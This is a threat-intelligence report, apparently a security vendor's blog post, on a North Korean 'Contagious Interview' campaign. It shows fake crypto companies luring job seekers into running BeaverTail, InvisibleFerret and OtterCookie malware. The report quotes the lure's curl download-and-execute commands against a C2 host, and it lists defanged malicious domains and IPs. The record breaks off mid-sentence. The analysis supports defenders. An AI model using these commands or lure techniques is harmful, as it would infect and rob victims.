{ "id": "79e79242-48e6-466a-9b23-b25c8a51b4f4", "created_at": "2026-04-06T00:07:42.825146Z", "updated_at": "2026-04-10T13:12:49.979521Z", "deleted_at": null, "sha1_hash": "0584b033a3b4ad06fdf8a1b26249314ffda17a60", "title": "Contagious Interview (DPRK) Launches a New Campaign Creating Three Front Companies to Deliver a Trio of Malware: BeaverTail, InvisibleFerret, and OtterCookie", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 28889019, "plain_text": "Contagious Interview (DPRK) Launches a New Campaign\r\nCreating Three Front Companies to Deliver a Trio of Malware:\r\nBeaverTail, InvisibleFerret, and OtterCookie\r\nBy Gareth Howells\r\nPublished: 2025-04-24 · Archived: 2026-04-05 15:42:45 UTC\r\nJoin our threat analysts for our Contagious Interview threat webinar on June 10:\r\nKey Findings\r\nSilent Push Threat Analysts have uncovered three cryptocurrency companies that are actually fronts for the\r\nNorth Korean advanced persistent threat (APT) group Contagious Interview: BlockNovas LLC, Angeloper\r\nAgency, and SoftGlide LLC.\r\nOur malware analysts confirmed that three strains, BeaverTail, InvisibleFerret, and OtterCookie, are being\r\nused to spread malware via “interview malware lures” to unsuspecting cryptocurrency job applicants.\r\nThe threat actor heavily utilizes AI-generated images to create profiles of “employees” for the three front\r\ncrypto companies, employing “Remaker AI” (remaker[.]ai) for some of the AI-generated images.\r\nAs part of the crypto attacks, the threat actors are heavily using GitHub, job listings, and freelancer\r\nwebsites.\r\nExecutive Summary\r\nSilent Push Threat Analysts recently identified and mapped out a new campaign linked to the North Korean APT\r\ngroup Contagious Interview. Also known as “Famous Chollima,” Contagious Interview is a subgroup of the North\r\nKorean state-sponsored APT group, Lazarus.\r\nContagious Interview has a history of launching sophisticated cyberattacks targeting individuals and organizations\r\nworldwide. In this new campaign, the threat actor group is using three front companies in the cryptocurrency\r\nconsulting industry—BlockNovas LLC (blocknovas[.] com), Angeloper Agency (angeloper[.]com), and SoftGlide\r\nLLC (softglide[.]co)—to spread malware via “job interview lures.”\r\nOur malware analysts have also confirmed that three different strains of malware are being spread from this\r\ninfrastructure: BeaverTail, InvisibleFerret, and OtterCookie, to unsuspecting cryptocurrency job applicants. \r\nDisclaimer: After being contacted by an individual claiming the threat actors referenced in this blog had stolen\r\ntheir identity, we have removed all references to them at their request.\r\nTable of contents\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 1 of 71\n\nKey Findings\r\nExecutive Summary\r\nBackground\r\nResearch Methodology\r\nInitial InvisibleFerret Malware Sample Associated with BeaverTail\r\nInvestigating lianxinxiao[.]com, a BeaverTail C2 Domain\r\nDNS Records for lianxinxiao[.]com Reveal a New Domain\r\nBlockNovas[.]com Infrastructure \u0026 Initial Ties to BeaverTail\r\nBlockNovas’ Mail Subdomain Hosting Dashboard Seen Monitoring Suspected BeaverTail Websites\r\nBlockNovas Mail Subdomain Hosting Hashtopolis, a Password Cracking Utility\r\nInvestigating Blocknovas[.]com, Numerous Red Flags\r\nBlockNovas LLC Business Registration Address: An Abandoned Lot in South Carolina, Principals\r\nNamed\r\nBlocknovas[.]com Business Details\r\nBlockNovas Website Claims Raise Significant Questions\r\nTracking Victims of the BlockNovas BeaverTail Malware Campaign\r\nGitlab.Blocknovas[.]com Hosting JS File Referencing the Golang Backdoor Frostyferret\r\nMisconfiguration Reveals a New Domain: apply-blocknovas[.]site\r\nInvestigating the Fake Interview Job Flow on “apply-blocknovas[.]site”\r\nAnalyzing the Malicious FrostyFerret Payload “nvidia-rc.update.zip”\r\nGolang Backdoor\r\nInvestigating the C2 Domain “camdriversupport[.]com”\r\nInvestigating BlockNovas’ GitHub Infrastructure\r\nBlockNovas Malware Analysis – Stage 1\r\nBlockNovas Malware Analysis – Stage 2: BeaverTail Malware Confirmation\r\nBlockNovas Malware Analysis – Stage 3: InvisibleFerret Main Stage\r\nBlockNovas Malware Analysis – Stage 4A: InvisibleFerret Payload Component\r\nBlockNovas BeaverTail Malware Analysis – Stage 4B: InvisibleFerret Browser Stealer Component\r\nNew lianxinxiao[.]com Panel Interface\r\nAdditional BlockNovas “Skill Assessment” Websites, New Cloudflare Obfuscation\r\nBlockNovas Skill Assessment GitHub Pivots from MongoDB Lead to “OtterCookie” Malware on\r\nserver[.]attisscmo[.]com\r\nNew Contagious Interview Tool “Kryptoneer” Found on attisscmo[.]com, Mysterious Connections to Sui\r\nBlockchain\r\nlianxinxiao[.]com and attisscmo[.]com Share “Decryption Failed” Response on C2 Port 8000\r\nBlockNovas Employee Analysis \u0026 Pivots\r\nBlockNovas LinkedIn Employees\r\nSuspected Fake Persona: Mehmet Demir\r\nMehmet Demir aka “Bigrocks918” Connected to Three Likely Contagious Interview Front\r\nCompanies: BlockNovas, Angeloper, and SoftGlide\r\nAngeloper[.]com Ties to BeaverTail Malware and Bigrocks918 Persona\r\nSoftGlide LLC Ties to Other Contagious Interview Infrastructure and Users\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 2 of 71\n\nBlockNovas Recruiter Alexander Nolan: A Known Fake\r\n“Individual A”: Likely Fake BlockNovas Developer\r\nContinuing to Track North Korean Threat Actors “Contagious Interview” Campaigns\r\nMitigation\r\nRegister for Community Edition\r\nSample Contagious Interview IOFA TM List\r\nBackground\r\nAs referenced above, Contagious Interview has been implicated in sophisticated cyber-espionage campaigns\r\ntargeting various industries, including technology and cryptocurrency sectors.\r\nContagious Interview threat actors’ tactics often involve social engineering. Our team found that they use fake job\r\noffers to distribute malware, such as BeaverTail, InvisibleFerret, and OtterCookie, to enable remote access and\r\ndata theft. Contagious Interview has utilized services like Astrill VPN and residential proxies to obfuscate their\r\ninfrastructure and activities, making detection more challenging. Our team has observed a new tactic that heavily\r\nutilizes AI-generated images.\r\nOur team initially identified an unusual configuration for BeaverTail malware in a sample available on VirusTotal.\r\nThrough several technical fingerprints, we identified a domain, lianxinxiao[.]com, that was observed to be both a\r\ncommand and control (C2) and staging server for BeaverTail and InvisibleFerret malware. The BeaverTail\r\nmalware we analyzed maintained persistence for all three desktop operating systems: Linux, macOS, and\r\nWindows.\r\nThrough open-source intelligence (OSINT), our team found victim stories referencing the “lianxinxiao” domain,\r\nwhich was also present in the malicious code we found after deobfuscating the BeaverTail and InvisibleFerret\r\nmalware.\r\nOur threat analysts were able to document fake job interview flows within the BlockNovas infrastructure and\r\nconnect multiple GitHub repositories associated with this scheme.\r\nWe also confirmed multiple victims of the Contagious Interview campaign, specifically via BlockNovas, the most\r\nactive front company. One of the alleged fake personas was even seen performing “gig development work,”\r\nalthough it’s unclear if they abused their access during these gigs. \r\nThe BlockNovas front company has 14 people allegedly working for them, however many of the employee\r\npersonas our team researched appear to be fake.\r\nAdditionally, on a BlockNovas subdomain, we were able to briefly access and archive details showing a “Status\r\nDashboard” where the threat actor group was maintaining visibility on four of their domains and several other\r\nservices. A separate BlockNovas subdomain was found hosting “Hashtopolis,” an open-source, distributed\r\npassword cracking management system.\r\nNorth Korean APTs are known to be persistent with their social engineering techniques. The following sites were\r\nfound to be used by Contagious Interview to lure victims focused on hiring, freelancing, or recruitment:\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 3 of 71\n\nCryptoJobsList[.]com\r\nCryptoTask[.]org\r\nGetOnBrd[.]com\r\nGuru[.]com\r\nFreelancer[.]com\r\nIntch[.]org\r\nJobatus[.]pt\r\nSignalHire[.]com\r\nThirdwork[.]xyz\r\nUpwork[.]com\r\nResearch Methodology\r\nSilent Push researchers want to publicly share some of our findings to empower defenders on Contagious\r\nInterview’s attack methods and how to mitigate them.\r\nMany of the employees who work for BlockNovas and within the cluster of Contagious Interview companies\r\nappear to be fake.\r\nWhile it is impossible to prove that all the employees are bogus, as some may be working in various support jobs.\r\nWe will highlight some of the red flags our team has identified without delving too deeply into the process.\r\nNote: Silent Push TLP: Amber reports provide details on our research exclusively for our Enterprise customers.\r\nFor reasons of operational security and to prevent threat actors from learning about how we track their mistakes,\r\nwe are unable to reveal all our pivots in a public-facing blog.\r\nInitial InvisibleFerret Malware Sample Associated with BeaverTail\r\nSilent Push Threat Analysts found an InvisibleFerret malware sample in VirusTotal, which had been detected as\r\nBeaverTail by several companies, including Microsoft.\r\nSince this file is actually Python malware, it is essential to distinguish it from InvisibleFerret, which is associated\r\nwith BeaverTail malware, rather than BeaverTail itself.\r\nAs described by Malpedia, “BeaverTail is a JavaScript malware primarily distributed through NPM packages. It is\r\ndesigned for information theft and to load further stages of malware, specifically a multi-stage Python-based\r\nbackdoor known as InvisibleFerret.”\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 4 of 71\n\nWe used VirusTotal to confirm the “main_empOQO[.]py” file’s activity\r\nUsing VirusTotal, we confirmed that the main_empOQO.py file was seen contacting the domain lianxinxiao[.]com\r\nas early as December 2024 and continued until March 2025. The C2 server remains active at the time of writing.\r\nhxxps://www.virustotal[.]com/gui/domain/lianxinxiao[.]com/relations\r\nSince most BeaverTail and InvisibleFerret samples observed in the wild do not use domains but instead contact\r\nthe C2 server directly via a hard-coded IP address, we decided to investigate the C2 domain lianxinxiao[.]com\r\nfurther.\r\nInvestigating lianxinxiao[.]com, a BeaverTail C2 Domain\r\nSilent Push Threat Analysts began by analyzing the BeaverTail C2 domain, which was identified through the\r\nprevious malware pivot.\r\nSince August 12, 2024, the domain lianxinxiao[.]com has resolved to 37.211.126[.]117 on AS44477 Stark\r\nIndustries Solutions LTD.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 5 of 71\n\nSilent Push Total View for lianxinxiao[.]com\r\nKnowing that the infrastructure was still online, we scanned for public directories or files.\r\nNavigating to lianxinxiao[.]com:5000/client allowed us to download an obfuscated Python script commonly seen\r\nin the follow-up step of a BeaverTail infection: InvisibleFerret.\r\nThe details below were captured in early March 2025.\r\nObfuscated InvisibleFerret script lianxinxiao[.]com\r\nDNS Records for lianxinxiao[.]com Reveal a New Domain\r\nOur Analysts discovered that the TXT and MX records* from lianxinxiao[.]com included another domain:\r\nblocknovas[.]com.\r\nTXT records from lianxinxiao[.]com referencing blocknovas[.]com via Total View\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 6 of 71\n\nMX records from lianxinxiao[.]com referencing blocknovas[.]com via Total View\r\n*Note: MX records contain the mail server(s) used by a given hostname to receive email. The Sender Policy\r\nFramework (SPF) utilizes TXT records to specify which IP addresses are authorized to send email on behalf of a\r\nhostname. TXT records have other uses as well, including domain and SSL verification.\r\nThe records that referenced the blocknovas[.]com domain had been live the entire time the domain\r\nlianxinxiao[.]com was seen spreading BeaverTail malware. This raised questions about the purpose of the\r\nblocknovas[.]com domain.\r\nThe blocknovas[.]com domain had 5 subdomains configured and hosted on different ASNs.\r\nThe details can be viewed by using our Silent Push Explore DNS Data feature for *.blocknovas[.]com.\r\nThe subdomains were:\r\nbookings[.]xxx\r\nchat[.]xxx\r\ngitlab[.]xxx\r\nmail[.]xxx\r\napply[.]xxx\r\nSubdomain IP ASN\r\nmail[.]blocknovas[.]com 167.88.39[.]141 AS47583 AS-HOSTINGER, CY\r\nbookings[.]blocknovas[.]com 136.143.190[.]199 AS2639 ZOHO-AS, US\r\ngitlab[.]blocknovas[.]com\r\nchat[.]blocknovas[.]com\r\n86.104.74[.]169\r\nAS44477 STARK-INDUSTRIES, GB\r\napply[.]blocknovas[.]com\r\n188.114.96.2 /\r\n188.114.97.2\r\n(Same as apex domain)\r\nAS13335 Cloudflare\r\nBlockNovas’ Mail Subdomain Hosting Dashboard Seen Monitoring Suspected BeaverTail\r\nWebsites\r\nThe domain mail[.]blocknovas[.]com had ports 3001 and 4200 open, exposing two different services.\r\nThe first port, 3001, exposed a dashboard to track the service level of specific websites or products.\r\nOn the dashboard hosted on mail[.]blocknovas[.]com, we were able to capture them tracking the following:\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 7 of 71\n\nlianxinxiao[.]com – the domain seen spreading BeaverTail malware via VirusTotal\r\nBlocknovas\r\nBlocknovas Gitlab\r\nBlocknovas Chat\r\nBlocknovas Mail\r\nAngeloperonline” – determined to be angeloperonline[.]online, another domain used by this group, further\r\ndescribed below.\r\nSoftglide[.]co – This was another tech consulting company, similar to the BlockNovas part of the scheme;\r\nmore details are provided below.\r\nmail[.]blocknovas[.]com:3001/status/blocknovas\r\nThis dashboard tied the three different companies and their products together, along with a malware staging and\r\nC2 domain. This was a significant OPSEC failure by Contagious Interview.\r\nBlockNovas Mail Subdomain Hosting Hashtopolis, a Password Cracking Utility\r\nThe second port exposed on the mail.blocknovas[.]com domain – port 4200 – recently hosted Hashtopolis – an\r\nopen-source password-cracking utility.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 8 of 71\n\nmail[.]blocknovas[.]com:4200\r\nInvestigating Blocknovas[.]com, Numerous Red Flags\r\nBlocknovas[.]com was registered in July 2024 via NameCheap and immediately added name server records from\r\nCloudflare.\r\nWe cover the infrastructure in more detail below; however, we will first outline the business details and claims as\r\npresented on the website.\r\nBlocknovas[.]com site\r\nBlockNovas LLC Business Registration Address: An Abandoned Lot in South Carolina,\r\nPrincipals Named\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 9 of 71\n\nOur analysts confirmed that the company “BlockNovas LLC” was registered (Bizapedia) in New Mexico, with the\r\nRegistered Agent details listed as “United States Corporation Agents, Inc.,” which is a service used by LegalZoom\r\nfor business registration.\r\nThe company address was listed as 2001 Augusta Rd, Warrenville 29851, SC, USA, which was also used as the\r\naddress for all “Members and Organizers”:\r\nBlockNovas LLC company registration listing “Ramon Mckenzie” and “Mehmet Demir,” and other\r\nbusiness details hxxps://www.bizapedia[.]com/nm/blocknovas-llc.html\r\nWhen searching the company address on Google Maps Street View, it does not seem to be a location where an\r\noffice or company was operating.\r\nThis street view photo was taken in February 2024:\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 10 of 71\n\n2001 Augusta Rd, Warrenville, SC – Feb. 2024 – Google Maps\r\nThe business registration details also included two company contacts:\r\nMehmet Demir\r\nRamon Mckenzie\r\nBoth of these names are likely tied to fake personas, as further detailed below.\r\nBlocknovas[.]com Business Details\r\nOther information about the organization included:\r\nWebsite: Blocknovas[.]com\r\nPhone: +1 (925) 953-2975\r\nEmail: contact@blocknovas[.]com\r\nCalendly Link: calendly[.]com/contact-blocknovas/30min\r\nAdditionally, BlockNovas had a presence on several social media platforms and services:\r\nLinkedIn: linkedin[.]com/company/blocknovas/\r\nMore details about employees found via LinkedIn are included below.\r\nPinterest: pinterest[.]com/blocknovas/\r\nOn Pinterest, the same phone number used on the website was shared (+1) (925) 953-2975.\r\nA unique email address was shared: “kisikbo5.werer@gmail[.]com”\r\nTwitter: x[.]com/blocknovasllc (Joined October 2024)\r\nTheir Twitter account posted about a “Senior Blockchain Developer” job on November 1, 2024.\r\nBoth the link and the job posting page were captured on the Wayback Machine.\r\nAlso on November 1, 2024, they tweeted a link to a Medium article “Cryptocurrency Market\r\nTrends: A Glimpse into the Future” (broken capture in Wayback Machine due to Medium archiving\r\ndefenses)\r\nName of author of the article from BlockNova: “Ramon Mckenzie”\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 11 of 71\n\nEmail address associated with the Medium account “ramon.tech@blocknovas[.]com”\r\n(Source)\r\nMore details on the Ramon Mckenzie persona are included later in the report.\r\nBlockNovas’ LinkedIn account with “Ramon Mckenzie” persona hxxps://medium[.]com/blocknovas\r\nFacebook facebook[.]com/blocknovas/ – page created on October 3, 2024\r\nThe “Blocknovas” Facebook “About” profile page\r\nThe BlockNovas Facebook page posted a link to the same job posting page that was promoted on Twitter – hosted\r\non blocknovas.zohorecruit[.]com on the same day, November 1, 2024.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 12 of 71\n\nThe Facebook page also featured the same address, “2001 Augusta Rd, Warrenville, SC 29851,” that was\r\ndisplayed in the footer of the BlockNovas website.\r\nBlockNovas’ Facebook page featured the same address as the BlockNovas’ website\r\nBlockNovas Website Claims Raise Significant Questions\r\nWhen viewing the “About Us” page of blocknovas[.]com via the Wayback Machine, the group claimed to have\r\nbeen operating for “12+ years,” – which is 11 years longer than the business has been registered:\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 13 of 71\n\nThe BlockNovas “About Us” page found on the Wayback Machine\r\nThey also claimed to have 20+ team members and 53+ completed projects.\r\nThe “About” page features “Our Team” photos with staff names, with at least one photo impersonating a real\r\nperson and likely others doing the same:\r\nJaime John – Human Resource (Confirmed Impersonating “Alejandro Borgonovo” from RAMP, Image\r\nSource, Direct Image Link)\r\nImogen Jonson – Business Manager (Appears to be impersonating “Ally Kendall” from “Culture Amp”\r\nSource)\r\nJim Allen – PM (Unclear impersonation)\r\nAleksandr Karelin – CTO (Unclear impersonation)\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 14 of 71\n\nhxxps://web.archive.org/web/20250404212159/hxxps://www.blocknovas.com/about-us\r\nThe BlockNovas Portfolio page (Wayback Machine) links to 20 companies they claimed to have worked with,\r\nincluding:\r\n1. Poloniex – poloniex[.]com\r\n2. Phemex – phemex[.]com\r\n3. LAtoken – latoken[.]com\r\n4. Marqeta – marqeta[.]com\r\n5. Oasis Pro Markets – oasispromarkets[.]com\r\n6. Hive – hive[.]com\r\n7. Godex – godex[.]io\r\n8. NobleBlocks – nobleblocks[.]com\r\n9. Future Exchange – futureexchange[.]io\r\n10. Flip[.]gg – flip[.]gg\r\n11. BitValve – bitvalve[.]com\r\n12. Arabian Camels – arabiancamels[.]io\r\n13. The Keepers Insurance – nftkeepers[.]io\r\n14. Kaisa – kaisa[.]io\r\n15. Smartwhales – smartwhales[.]ai\r\n16. Crypto Hunter – hunt-crypto[.]com\r\n17. Olive \u0026 Chain – oliveandchain[.]com\r\n18. Henry K. Diamonds – henrykdiamonds[.]com\r\n19. Your Bijoux Box – yourbijouxbox[.]com\r\n20. All Purpose Creams – allpurposecreams[.]com\r\nThe blocknovas[.]com footer included links to their social channels and a banner that alluded to their work with\r\nIkea, Vodafone, BlockFi, and “Nia” (an exercise brand from Oregon).\r\nExample of the BlockNovas page with social links and footer\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 15 of 71\n\nExternal marketing pages from job placement services like “Welcome to the Jungle,” which promotes\r\nBlockNovas, also claimed they worked with Ikea and Vodafone:\r\nBlocknovas’ profile on the “Welcome to the Jungle” job portal\r\nTracking Victims of the BlockNovas BeaverTail Malware Campaign\r\nSilent Push Analysts took our initial leads into the BlockNovas campaign and were able to identify two developers\r\ntargeted by the campaign; one of them allegedly had their MetaMask wallet compromised.\r\nThe first public victim, “topninja,” posted on September 18, 2024, on dev[.]to, detailed how a job offer turned into\r\na wallet compromise:\r\n“I wanted to share how my MetaMask wallet was hacked yesterday as a cautionary tale.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 16 of 71\n\nI received a new project through Freelancer.com. The client had a ‘payment verified’ badge, so I assumed they\r\nwere legitimate. The project involved web3 backend development, which I was confident I could handle.\r\nAfter accepting the contract, the client invited me to their GitLab project and asked me to run their backend code.\r\nSoon after running it, I realized that my MetaMask wallet had been compromised. Fortunately, I didn’t lose much\r\nmoney, but I want to warn everyone to be cautious when running new code on your machine.\r\nAfter analyzing the code, I discovered that it downloads and executes a script file. I’ve attached the code here.”\r\nTopninja shared the malicious code, which included a request to the known BeaverTail distributing domain\r\nlianxinxiao[.].com:\r\nhxxps://dev[.]to/topninja/i-hacked-web3-wallet-15e4\r\nAnother developer named Junaid Khan was targeted in this same campaign, and shared details just days later on\r\nLinkedIn on September 23, 2024\r\nKhan was asked to perform a contractor skill assessment by accessing code on a BlockNovas subdomain\r\n(gitlab[.]blocknovas[.]com) posted by a BlockNovas employee named “Ramon Mckenzie” (the same name seen\r\non BlockNovas business registration documents). Khan quickly identified the code as malicious.\r\nHe described additional details about the lure:\r\nI received a job invitation from a client asking me to make some “minor changes” to an existing project as part of\r\na test assessment. They provided me with a repository link: hxxps://gitlab.blocknovas[.]com/super/nyx1.2upgrade-test-public\r\nOn the surface, everything seemed legit. The changes they requested appeared to be minor tweaks to the\r\nJavaScript code. However, once I ran the provided code, I quickly realized something far more dangerous was\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 17 of 71\n\nhappening under the hood.\r\nThe Issue:\r\nThe code includes an eval() function vulnerability in JavaScript. For those unfamiliar, eval() can execute arbitrary\r\ncode within the running program, making it extremely dangerous when used without proper sanitation. This\r\nspecific instance allows the client to run arbitrary and potentially malicious code on your system without your\r\nknowledge or consent.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 18 of 71\n\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 19 of 71\n\nJunaid Khan warning for Ramon Mckenzie – BlockNovas lure\r\nSilent Push Threat Analysts were able to access the GitLab account that was spreading the malicious code shared\r\nfrom Junaid Khan’s LinkedIn post.\r\nThe “Ramon Mckenzie” (atypical spelling for “McKenzie”) persona can be seen on the account:\r\nMalicious repository previously hosted on gitlab.blocknovas[.]com/rmadmin/ncipher1.2upgrade-backend\r\nGitlab.Blocknovas[.]com Hosting JS File Referencing the Golang Backdoor Frostyferret\r\nApril 2025: The root of gitlab.blocknovas[.]com was still hosted in a JavaScript file that contained all the details\r\nin the fake interview flow and included the C2 domain, which deployed malware (also seen on other fake\r\ninterview domains used in this campaign).\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 20 of 71\n\nview-source:hxxps://gitlab.blocknovas[.]com/\r\nWithin the JS file, strings could be found that clearly referenced the fake interview campaign:\r\n“Join Blocknovas”\r\n“In the next step, you will be asked to create a short video introduction of yourself, so please be prepared to\r\nshare a little about your background and why you’re interested in this role. Make sure you’re in a quiet\r\nenvironment and ready to focus.”\r\n“We will review your application carefully. Take a break and have a coffee, We’ll get in touch with you\r\nsoon to let you know the status.”\r\n“In-depth discussion about your experience and skills. The goal of this interview is for us to get to know\r\nyou, your background, and experience better, and for you to ask any questions you may have.”\r\nAnd a series of strings asked about English proficiency:\r\n“I can interact in a simple way, if the other person talks slowly and is able to cooperate.”\r\n“I can explain my decisions and understand most instructions, in both text and speech. I occasionally need\r\nthings to be repeated so I can understand.”\r\n“I understand and use complex speech and text, including technical topics in my field. I can speak\r\nspontaneously, without causing strain for myself or others.”\r\n“I can easily understand almost everything I hear or read, and speak confidently using finer shades of\r\nmeaning in complex situations.”\r\nThen the malicious shell commands to connect to their C2 hosted on “easydriver[.]cloud” were included for\r\nWindows, Mac, and Linux:\r\nreturn `curl -k -o /var/tmp/nvidia_update.sh hxxps://easydriver[.]cloud/nvidia-nx.update/${l} \u0026\u0026 chmod +x /var/\r\nreturn `curl -k -o /var/tmp/nvidia_mac.sh hxxps://easydriver[.]cloud/nvidia-mac.update/${l} \u0026\u0026 chmod +x /var/tm\r\nreturn `curl -k -o \"%TEMP%\\\\nvidiaupdate.zip\" hxxps://easydriver[.]cloud/nvidia-rc.update/${l} \u0026\u0026 powershell -C\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 21 of 71\n\nreturn `curl -k -o \"%TEMP%\\\\nvidiaupdate.zip\" hxxps://easydriver[.]cloud/nvidia-rc.update/${l} \u0026\u0026 powershell -C\r\nSimilar text strings found within the JavaScript on gitlab.blocknova[.]com were also detected on a live BeaverTail\r\nfake interview domain.\r\nMisconfiguration Reveals a New Domain: apply-blocknovas[.]site\r\nOn March 5, 2025, Silent Push analysts connected to the gitlab.blocknovas[.]com domain and received an SSL\r\nerror, which referenced an entirely new domain referencing the BlockNovas brand:\r\napply-blocknovas[.]site\r\nThe domain apply-blocknovas[.]site also pointed to the earlier mentioned IP address: 86.104.74[.]169.\r\nScreenshot of an SSL error on gitlab.blocknovas[.]com referencing the domain “apply-blocknovas[.]site”\r\nInvestigating the Fake Interview Job Flow on “apply-blocknovas[.]site”\r\nAfter our threat analysts found the SSL error on gitlab.blocknovas[.]com referencing the above domain, the shared\r\nbrand name in the domain and SSL certificate indicated this was new infrastructure from the same threat actor.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 22 of 71\n\nWe analyzed the content on the new apply-blocknovas[.]site domain and further connected it via the same\r\nlanguage and strings seen previously in the JavaScript file on the root of gitlab.blocknovas[.]com.\r\nThe root hosted a job application form for a crypto company—the same type of lure seen in previous “Contagious\r\nInterview” phishing flows. The first step of the application includes a checkbox asking the applicant to consent to\r\n“the use of call recording, note-taking tools and external assessment tools,” which helped prime the future video\r\ninterview lure.\r\n“Apply for Exciting Opportunities in Blockchain and Crypto” from apply-blocknovas[.]site\r\nThe next step requested location information and included a testimonial from “Alice Johnson, CEO, FinTech\r\nInnovations Ltd.” Several image analysis tools indicated that this face was likely AI-generated, and there was no\r\nindication of an actual person with this name or a company with this name.\r\n“Where are you based?” from apply-blocknovas[.]site/location\r\nThe next step asked for the amount of experience the applicant had as a professional crypto trader:\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 23 of 71\n\nThe site asked the applicant, “How much full-time, professional experience do you have in CRYPTO\r\nTRADER?”\r\nAn additional question about work obligations encouraged the applicant with, “Create more impact with a full-time commitment.”\r\n“What type of commitment do you prefer?” from apply-blocknovas[.]site\r\nThen a question posed, “What’s your English level?” had the exact same language seen in the JavaScript on\r\ngitlab.blocknovas[.]com:\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 24 of 71\n\nAn applicant was asked, “What’s your English level?” from apply-blocknovas[.]site\r\nThe next step requested a written response to “Describe your experience in business development” to further\r\nengage the applicant’s commitment in the process. It also asked, “What industries or sectors have you primarily\r\nworked in, and what types of companies have you worked with?”\r\nThe request for information about companies an applicant had worked with could be useful for a threat actor\r\ndeploying malware onto an applicant’s device, and who wanted to know what credentials of the job seeker could\r\nbe exposed.\r\nThe applicant was then asked, “Describe your experience in business development”\r\nThe final step before the malware lure was deployed requested social and website links:\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 25 of 71\n\nThe applicant was then asked, “Can you add your links?” from apply-blocknovas[.]site/links\r\nBlockNovas then deployed a classic “Record Your Video Introduction” lure used by Contagious Interview with\r\ndetails such as:\r\n“What excites you the most about the future of blockchain technology and its potential impact on\r\nindustries?”\r\n“Keep your introduction between 1-3 minutes”\r\n“Ensure good lighting and clear audio”\r\n“Briefly introduce yourself and your background”\r\n”Mention your key skills and experience”\r\n“Explain why you’re interested in this position”\r\nCTA buttons include “Record Now”, “Record Again”, “Download”, and “Upload”\r\nThe classic lure was then posed to the applicant: “Record Your Video Introduction”\r\nIf the job-seeker, also known as the intended victim, clicked any of the call-to-action buttons, a pop-up would\r\nappear with an “Access to your camera or microphone is currently blocked” message along with a “ClickFix”\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 26 of 71\n\ncopy-and-paste lure. If the command prompted by the lure was executed on a Windows, Mac, or Linux device, it\r\nwould execute the malware.\r\nText in the pop-up had slight variations for different devices; the Windows prompt is featured below:\r\n“Access to your camera or microphone is currently blocked” pop-up from apply-blocknovas[.]site/video-intro\r\nAnalyzing the Malicious FrostyFerret Payload “nvidia-rc.update.zip”\r\nSilent Push Threat Analysts acquired the payload being served via apply-blocknovas[.]site and were able to\r\nconnect it to other known infrastructure from Contagious Interview.\r\nThe file was retrieved via the previous site, “nvidia-rc.update.zip,” which contained the following files:\r\nupdate.vbs, nvidia.js, npx.cmd, npx, nmp.cmd, npm, nodevars.bat, node.exe, install_tools.bat,\r\ncorepack.cmd, corepack\r\nThe “Date Modified” for several of these files dates back as early as June 26, 2023, with other significant updates\r\nin May and November of 2024—this could provide an indication of when the Contagious Interview scheme was\r\nbeing developed.\r\nSome of the files within the directory were most likely legitimate Node JS files and dependencies, so not all files\r\nhere should be considered malicious without further investigation.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 27 of 71\n\nFile contents from “nvidia-rc.update.zip” downloaded from “apply-blocknovas[.]site”\r\nAnalyzing the file “nvidia[.]js”, two URLs embedded in the file were discovered:\r\nhxxps://api.camdriversupport[.]com/nvidiawin.update\r\nhxxps://easydriver[.]cloud/nvidiawin.update\r\nnvidia.js from easydriver[.]cloud\r\nGolang Backdoor\r\nThe easydriver[.]cloud/nvidiawin[.]update file path, when accessed, resulted in the download of a new file,\r\n“nvidiawin[.]update[.]zip”.\r\nDownloading “nvidiawin[.]update[.]zip” from easydriver[.]cloud/nvidiawin.update\r\nWe found ”nvidiawin[.]update[.]zip” revealed the following files and folders:\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 28 of 71\n\nFiles and folders revealed on nvidiawin[.]update[.]zip\r\nOn further investigation of the files, we discovered the file “nvidiaupdate[.]go” revealed a C2 configuration for the\r\nIP address “37.221.126[.]117:8000.” We saw a similar file structure in our previous reporting, referenced here:\r\nNorth Korea-nexus Golang Backdoor/Stealer from Contagious Interview campaign | dmpdump, where the Golang\r\nBackdoor was also seen.\r\nThe IP address is the same one that hosts lianxinxiao[.]com, a domain that spreads BeaverTail, and which has been\r\nmapped to the dedicated IP 37.221.126[.]117 since August 12, 2024.\r\nThe domain lianxinxiao[.]com had 11 detections in VirusTotal:\r\nHowever, the dedicated IP address that had been hosting the lianxinxiao[.]com domain for months and was also\r\nhardcoded as a C2 within their malware, had 0 detections in VirusTotal:\r\nInvestigating the C2 Domain “camdriversupport[.]com”\r\nThe malicious payload from the “apply-blocknovas[.]site” exposed the above C2 domain.\r\nOur threat analysts accessed content on this 